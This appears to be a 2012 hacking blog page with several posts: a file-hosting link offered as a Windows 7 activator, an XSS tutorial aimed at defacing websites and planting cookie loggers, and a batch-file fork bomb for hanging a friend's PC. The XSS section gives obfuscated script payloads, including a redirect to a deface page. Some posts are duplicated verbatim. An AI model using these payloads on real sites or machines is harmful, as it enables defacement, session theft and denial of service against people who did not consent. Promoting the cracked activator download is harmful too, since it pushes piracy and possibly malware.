Saturday, September 29, 2012
Thursday, August 16, 2012
Wednesday, June 20, 2012
http://www.mediafire.com/?kfb3zdqxxcxc34w
Monday, April 9, 2012
windows 7 activator
just click install and reboot ur system and enjoy activated windows 7
happy hacking
plzzz follow my blog to get more
happy hacking
what is xss ???
XSS?
XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection. However, you can inject other languages which will be shown later.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.
types of XSS?
There are two types of XSS. Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger. cookie logger xss is good one.
test xss
To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.
**<*script*>alert('XSS');
(remove every * )
We now see a pop up message on our screen saying "XSS".
In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.
"*>*alert('XSS');
(remove every * )
Okay, we have found out that it is vulnerable. We can now move on.
How can I deface a webpage with XSS?
I will be showing you methods for persistent, and non-persistent XSS.
Persistent XSS.
First I will be starting with persistent XSS. Since it's persistent I want to redirect my victims to a deface page. We simply just inject this some more Javascript like we did before:
<*script*>window.location="*http://yourdefacepage.com/index.html";<*/script*>
(remove every * )
Remember, you can always alter the code if it doesn't work.
You can do many things with XSS, you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.
Non-persistent XSS.
Okay. Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger.
XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection. However, you can inject other languages which will be shown later.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.
types of XSS?
There are two types of XSS. Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger. cookie logger xss is good one.
test xss
To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.
**<*script*>alert('XSS');
(remove every * )
We now see a pop up message on our screen saying "XSS".
In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.
"*>*alert('XSS');
(remove every * )
Okay, we have found out that it is vulnerable. We can now move on.
How can I deface a webpage with XSS?
I will be showing you methods for persistent, and non-persistent XSS.
Persistent XSS.
First I will be starting with persistent XSS. Since it's persistent I want to redirect my victims to a deface page. We simply just inject this some more Javascript like we did before:
<*script*>window.location="*http://yourdefacepage.com/index.html";<*/script*>
(remove every * )
Remember, you can always alter the code if it doesn't work.
You can do many things with XSS, you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.
Non-persistent XSS.
Okay. Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger.
The easiest way to get your friends PC hanged!
To hang windows explorer:
Get access to your friend's PC Or try it yourself
Open Notepad(Start > All Programs > Accessories > Notepad).
Copy the following code and paste it in notepad.
@echo off
:A
start
goto:A
From the Menu bar, click on File > Save As. The Save As dialog box opens.
Under the Save as type select All Files option. Write a desired name for your file, for example hang.bat [Remember to give a .bat extension to your file name].
Now Open the hang.bat file and see the computer getting hanged!
Get access to your friend's PC Or try it yourself
Open Notepad(Start > All Programs > Accessories > Notepad).
Copy the following code and paste it in notepad.
@echo off
:A
start
goto:A
From the Menu bar, click on File > Save As. The Save As dialog box opens.
Under the Save as type select All Files option. Write a desired name for your file, for example hang.bat [Remember to give a .bat extension to your file name].
Now Open the hang.bat file and see the computer getting hanged!
Subscribe to:
Posts (Atom)